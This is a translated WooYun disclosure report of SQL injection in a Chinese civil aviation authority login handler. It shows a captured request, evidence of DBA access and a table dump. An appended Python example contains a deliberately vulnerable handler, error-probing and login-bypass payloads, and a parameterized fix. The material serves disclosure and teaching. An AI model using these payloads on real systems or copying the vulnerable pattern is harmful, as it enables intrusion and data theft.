
Vulnerability summary

Defect ID: wooyun-2015-0139566

Title: SQL injection vulnerability on a Civil Aviation Administration of China site

Affected vendor: Civil Aviation Administration of China (中国民航局)

Author: Xmyth_夏洛克

Submitted: 2015-09-09 18:49

Fix time: 2015-10-26 14:36

Published: 2015-10-26 14:36

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-09: Details sent to the vendor; awaiting vendor handling
2015-09-11: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the notifying body
2015-09-21: Details disclosed to core white hats and relevant domain experts
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to intern white hats
2015-10-26: Details disclosed to the public

Brief description:

2333333

Details:

Injectable URL:
http://**.**.**.**/Portal/RfSoft.MapleTr.DPS/Hr/Html/Login.htm?autologin=false

[Screenshot: login page]


The username field is injectable; the database error message returned by the login handler shows it.

[Screenshot: database error message]


Proof of concept:

Captured POST request (note that the body is an XML document even though the Content-Type header says application/x-www-form-urlencoded):

POST /Portal/RfSoft.MapleTr.DPS/Hr/Control/LoginHandler.ashx?opType=LOGIN HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/Portal/RfSoft.MapleTr.DPS/Hr/Html/Login.htm?autologin=false
Content-Length: 64
Cookie: msid=w2lfnpcfzlipsk2ojbnflqpg
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<Login><UserName>123</UserName><Password>1234</Password></Login>


The UserName parameter is injectable, and the database account runs with DBA privileges.

[Screenshot: DBA privilege check]


24 databases are reachable.

[Screenshot: list of 24 databases]


The data volume is considerable; row counts for the CMSIS database:

Database: CMSIS
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| TEMP_AET2013110600008 | 669097 |
| TEMP_AET2013110700024 | 642707 |
| TEMP_AET2013110700033 | 495932 |
| MH_RENYUAN_INFO | 32597 |
| TEMP_AET2013110700015 | 16189 |
| DPS_LOG | 15780 |
| TEMP_AET2013110600002 | 10566 |
| TEMP_AET2013110600005 | 6906 |
| FILEINFO | 6327 |
| TEMP_AET2013110600011 | 4981 |
| TEMP_AET2013110700038 | 4952 |
| TEMP_AET2013111800003 | 2272 |
| TEMP_AET2013110700018 | 2231 |
| TEMP_AET2013110600006 | 1976 |
| DPS_SE_ROLE_USER | 1804 |
| TEMP_AET2013110600010 | 1706 |
| ETL_DATA_LOG | 1403 |
| ETL_DATAFILE_INFO | 1403 |
| TEMP_AET2013110600010A | 1122 |
| DPS_USER | 934 |
| DPS_USER_ORG | 902 |
| TEMP_AET2013110700036 | 835 |
| MH_MRO_INFO | 805 |
| MH_DATA_STATE | 696 |
| TEMP_AET2013110700027 | 647 |
| TEMP_AET2013110600004 | 495 |
| TEMP_AET2013110700021 | 486 |
| ETL_TABLE_COLUMN | 428 |
| TEMP_AET2013110600009 | 392 |
| DMD_MODELMEMBERS | 371 |
| DMD_MODELMEMBERS_HISVERSION | 317 |
| TEMP_AET2013110400002 | 284 |
| TEMP_AET2013110400003 | 274 |
| MH_JIANCHAYUAN_INFO | 241 |
| OMD_OBJECTMANAGE_PROPERTRY | 237 |
| TEMP_AET2013110700041 | 207 |
| TEMP_AET2013111800006 | 196 |
| C_DATADICTIONARY | 182 |
| DPS_MENU | 170 |
| TEMP_ET2013110100003 | 164 |
| TEMP_AET2013110400004 | 150 |
| DPS_SE_AUTHORIZE | 149 |
| TEMP_AET2013110700030 | 142 |
| TEMP_AET2013110600007 | 126 |
| TEMP_AET2013110600003 | 114 |
| MH_AIRLINE_INFO | 109 |
| S_AUTOCODE | 86 |
| TEMP_AET2013110700009 | 83 |
| C_TREEBASE_LEVELICON | 53 |
| ETL_CLASS | 50 |
| C_TABBASE_PARAM | 48 |
| LS_INDIVIDUATION_INFO | 47 |
| BS_BUSINESS_RESOURCE | 40 |
| DMD_SYSCONFIG | 40 |
| C_TREEBASE | 39 |
| MH_TIANBIAO_INFO | 36 |
| LS_SYSINFO | 34 |
| ETL_TABLE_DATA_RELATION | 31 |
| TEMP_AET2013110700012 | 31 |
| ETL_SUB_CLASS | 30 |
| OMD_OBJECTMANAGE_VIEW | 27 |
| OMD_OBJECTMANAGEVIEW_GROUP | 27 |
| PUBLISH_INFORM_DEPARTMENT | 23 |
| DMD_SYSCONFIG_HISTORYVERSION | 22 |
| LDM_SYS_OPTIONS | 22 |
| WF_WORKFLOW_FUNCTION | 21 |
| LDM_SYS_MSG | 19 |
| DPS_PART_VIEW | 16 |
| OMD_OBJECT_V_R_FUN | 14 |
| TREE_HELP_USE | 12 |
| BS_RESOURCE | 11 |
| MH_FENZHIJIGOU_INFO | 10 |
| DPS_SE_ROLE | 8 |
| LINKAGEFORVILLAGE | 8 |
| DPS_LOG_TYPE | 7 |
| DPS_PART_TEMPLATE | 7 |
| BC_FORMAT | 6 |
| MH_DOCUMENTFILE | 6 |
| DPS_ORGANIZATION | 5 |
| PULISH_INFORM | 5 |
| LDM_EXCEL_TOOLS | 4 |
| LINKAGEFORCITY | 4 |
| BC_CONNECTION | 3 |
| C_TABBASE | 3 |
| DPS_LOG_FLAGTYPE | 3 |
| DPS_MESSAGESTATE_TYPE | 3 |
| BC_CONFIG | 2 |
| DC_BASEINFO | 2 |
| DC_DIR_ELEMENT_RELATION | 2 |
| DPS_PART_PAGE | 2 |
| LINKAGEFORPROVINCE | 2 |
| BC_INSTANCE | 1 |
| CONTROL_FUNCTION | 1 |
| DC_ROOT_DIR | 1 |
| DPS_COMMON_MODULEMENU | 1 |
| DPS_SITE | 1 |
| XF_CODE_COMPANY | 1 |
+------------------------------+---------+


Fix:

Filter input. Concretely: stop splicing the UserName and Password values from the XML body into the SQL text and bind them as parameters of a prepared statement (or stored-procedure parameters); run the application with a least-privilege database account instead of DBA; and return a generic login failure to the client rather than the raw database error, which is what gave the injection away.
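The following is an added example, not code from the report or from the affected site's vendor. It reconstructs in Python, on an in-memory SQLite database, the pattern the report describes: a login handler that parses the XML body shown in the proof of concept and splices UserName into its query. It reproduces the error-message signal from the Details section, an authentication bypass through the same field, and the parameterized fix recommended above. The table name DPS_USER is borrowed from the dump; its columns, the sample rows, the request bodies and the SQL text are assumptions (the real handler's query is not on the page).

```python
# Added example (not the report's or the vendor's code): a minimal model of
# the login handler described above, built on SQLite so it runs offline.
import sqlite3
import xml.etree.ElementTree as ET

# Constructed request bodies, same shape as the captured POST above.
BENIGN_BODY = "<Login><UserName>123</UserName><Password>1234</Password></Login>"
ERROR_BODY = "<Login><UserName>123'</UserName><Password>1234</Password></Login>"
BYPASS_BODY = ("<Login><UserName>' OR '1'='1' --</UserName>"
               "<Password>x</Password></Login>")


def setup_db():
    """Constructed sample schema: DPS_USER is a table name from the dump above;
    its columns and rows are assumptions made for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE DPS_USER (UserName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO DPS_USER VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    conn.commit()
    return conn


def parse_login(body):
    """Extract UserName and Password from the <Login> XML document."""
    root = ET.fromstring(body)
    if root.tag != "Login":
        raise ValueError("unexpected root element %r" % root.tag)
    return root.findtext("UserName", ""), root.findtext("Password", "")


def login_vulnerable(conn, body):
    """Assumed shape of the bug: the parsed values are spliced into the SQL
    text, so a quote in UserName changes the query instead of the data."""
    user, pw = parse_login(body)
    sql = ("SELECT UserName FROM DPS_USER WHERE UserName = '%s' "
           "AND Password = '%s'" % (user, pw))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, body):
    """Same lookup with bound parameters: the driver passes the input as data,
    so its contents cannot alter the query structure."""
    user, pw = parse_login(body)
    row = conn.execute(
        "SELECT UserName FROM DPS_USER WHERE UserName = ? AND Password = ?",
        (user, pw),
    ).fetchone()
    return row[0] if row else None


def probe_error(conn, body):
    """Return the database error text the vulnerable handler leaks for a
    malformed query (the signal the report saw on the error page), else None."""
    try:
        login_vulnerable(conn, body)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = setup_db()
    print("benign login   :", login_vulnerable(db, BENIGN_BODY))
    print("error leak     :", probe_error(db, ERROR_BODY))
    print("bypass (vuln)  :", login_vulnerable(db, BYPASS_BODY))
    print("bypass (fixed) :", login_fixed(db, BYPASS_BODY))
```

With the vulnerable handler, a single quote in UserName yields a database error (the report's first indicator), and `' OR '1'='1' --` logs in as the first user in the table; the parameterized handler treats both payloads as literal usernames and matches nothing.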

Copyright: when reposting, credit Xmyth_夏洛克@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2015-09-11 14:35

Vendor reply:

CNVD confirmed and reproduced the described issue and has passed it via CNCERT to the civil aviation industry evaluation center for notification, which will coordinate handling with the website's operating unit. It has also been reported in parallel to the national superior information-security coordination body.

Latest status:

None yet